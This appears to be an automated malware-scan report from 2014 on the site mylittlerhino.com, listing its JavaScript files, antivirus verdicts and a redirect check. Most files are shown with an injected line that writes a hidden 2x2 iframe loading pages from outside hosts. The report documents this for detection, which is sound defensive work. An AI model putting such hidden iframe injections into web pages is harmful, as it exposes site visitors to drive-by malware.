Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mylittlerhino.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://mylittlerhino.com/ | 200 OK Content-Length: 2858 Content-Type: text/html | clean |
http://mylittlerhino.com/jslib/common.js | 200 OK Content-Length: 3138 Content-Type: application/x-javascript | clean |
http://mylittlerhino.com/jslib/smoothmovement.js | 200 OK Content-Length: 4572 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953></iframe>');
function SmoothMovement(position, target){ this.position = position; this.target = target; this.velocity = 0; this.animationInterval = null; } SmoothMovement.prototype.update = function(){ if (this.velocity < 0){ if (this.targe SmoothMovement.prototype.createAnimationClosure = function( updateListener, stopListener){ var thisObject = this; return function(){ thisObject.update(); updateListener(thisObject.position, thisObject); if (thisObject.hasStopped()){ window.clearInterval(thisObject.animationInterval); thisObject.animationInterval = null; if (stopListener) stopListener(thisObject); } } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://photographybybarbi.com/waas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/slideb.js | 200 OK Content-Length: 1794 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953></iframe>');
function Slide() { this.id = 0; this.cnt = 0; this.sm = new SmoothMovement(744, 0); } Slide.prototype.beginslide = function() { this.cnt = $("cnt").value; if (this.cnt > 1) { this.id = 0; main.slide.displaypic(this.id); $("p" + id).style.zIndex = "89"; this.id = id; var cnt = this.cnt; $("p" + id).style.zIndex = "88"; $("p" + id).style.left = '0px'; for (var i = 0;i<cnt;i++) { if (i != id && parseInt($("p" + i).style.zIndex) > 87) { $("p" + i).style.zIndex = "87"; $("p" + i).style.left = "744px"; }} } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fxfocus.co.uk/cwzs.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953> | ||
http://mylittlerhino.com/jslib/payment.js | 200 OK Content-Length: 3232 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953></iframe>');
function Payment() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } Payment.proto data = addd(data,pf("c4")); data = addd(data,pf("c5")); data = addd(data,pf("c6")); data = addd(data,pf("bank")); data = addd(data,pf("method")); data = addd(data,pf("amount")); data = addd(data,pf("remark")); this.request.send(data); } } Payment.prototype.paymentsave = function () { this.postcall('phpengine/service/paymentcreate.php'); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://photographybybarbi.com/waas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/contactus.js | 200 OK Content-Length: 2974 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953></iframe>');
function Contactus() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } Contactus.prototype. data = addd(data,pf("ct")); this.request.send(data); } } Contactus.prototype.contactusform = function () { this.getcall('','','phpengine/contactus/contactus.php'); }; Contactus.prototype.contactussave = function () { this.savecall('phpengine/contactus/contactussave.php'); }; Contactus.prototype.contactus01 = function () { this.getcall('','','phpengine/contactus/contactus01.php'); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fxfocus.co.uk/cwzs.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953> | ||
http://mylittlerhino.com/jslib/member.js | 200 OK Content-Length: 6251 Content-Type: application/x-javascript | clean |
http://mylittlerhino.com/jslib/cart.js | 200 OK Content-Length: 12661 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953></iframe>');
function Cart() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} this.productid = " this.request.onreadystatechange = ajaxcall(this,this.silentresult); data = addd(data,pf("login")); data = addd(data,pf("pwd")); $("exnote").innerHTML = ""; this.request.send(data); } else { $("exnote").innerHTML = "รหัสà¸à¹à¸²à¸à¹à¸¡à¹à¸ªà¸²à¸¡à¸²à¸£à¸à¹à¸§à¹à¸à¸§à¹à¸²à¸à¹à¸à¹"; } } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://photographybybarbi.com/waas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/homemenu.js | 200 OK Content-Length: 6043 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953></iframe>');
function HomeMenu() { this.selsubproduct = ""; this.selinproduct = ""; this.selhomemenu = ""; } HomeMenu.prototype.dohomemenu =function (newmenu) { if (this.selhomemenu.substr(0,2) == "mc") { $(this.selhomemenu).className="catagoryme } if (code == "mpa") { $("mpsaa").style.display = ds; $("mpsab").style.display = ds; } if (code == "mp7") { } if (code == "mp8") { } if (code == "mp9") { } if (code == "mpb") { } if (code == "mpc") { } if (code == "mpd") { $("mpsda").style.display = ds; $("mpsdb").style.display = ds; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://photographybybarbi.com/waas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/home.js | 200 OK Content-Length: 4016 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953></iframe>');
function HomeEngine() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } HomeEngine.prototyp }; HomeEngine.prototype.saledetail = function (code,dir) { this.getcall(code,dir,'phpengine/home/saledetail.php'); }; HomeEngine.prototype.collectiondetail = function (code,dir,col) { this.getcall(code,dir,'phpengine/collection/collectiondetail.php',col); }; HomeEngine.prototype.searchdetail = function (code,dir,col) { this.getcall(code,dir,'phpengine/home/searchdetail.php',col); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fxfocus.co.uk/cwzs.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953> | ||
http://mylittlerhino.com/jslib/service.js | 200 OK Content-Length: 2022 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://4maximumhealth.com/meas.html?j=1358953></iframe>');
function ServiceEngine() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } ServiceEngi this.getcall('','','phpengine/service/service03cm.php'); }; ServiceEngine.prototype.deliveryprocess = function () { this.getcall('','','phpengine/service/service04.php'); }; ServiceEngine.prototype.deliverycheck = function () { this.getcall('','','phpengine/service/service05.php'); }; ServiceEngine.prototype.productchange = function () { this.getcall('','','phpengine/service/service06.php'); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://4maximumhealth.com/meas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://4maximumhealth.com/meas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/mainajax.js | 200 OK Content-Length: 1947 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://4maximumhealth.com/meas.html?j=1358953></iframe>');
function MainAjax() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } this.getcall('','','phpengine/service/service.php'); }; MainAjax.prototype.orderadmin = function () { this.getcall('','','phpengine/orderadmin/orderadmin.php'); }; MainAjax.prototype.stockadmin = function () { this.getcall('','','phpengine/stockadmin/stockadmin.php'); }; MainAjax.prototype.memberadmin = function () { this.getcall('','','phpengine/memberadmin/memberadmin.php'); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://4maximumhealth.com/meas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://4maximumhealth.com/meas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/mainengine.js | 200 OK Content-Length: 7221 Content-Type: application/x-javascript | clean |
http://mylittlerhino.com/test404page.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mylittlerhino.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Apr 2014 21:30:10 GMT
Server: Apache/2.2.23 (CentOS)
Content-Length: 2858
Content-Type: text/html; charset=None
X-Powered-By: PHP/5.2.17
...2858 bytes of data.
GET / HTTP/1.1
Host: mylittlerhino.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Apr 2014 21:30:10 GMT
Server: Apache/2.2.23 (CentOS)
Content-Length: 2858
Content-Type: text/html; charset=None
X-Powered-By: PHP/5.2.17
...2858 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mylittlerhino.com
Referer: http://www.google.com/search?q=mylittlerhino.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mylittlerhino.com
Referer: http://www.google.com/search?q=mylittlerhino.com
Result:
The result is similar to the first query. There are no suspicious redirects found.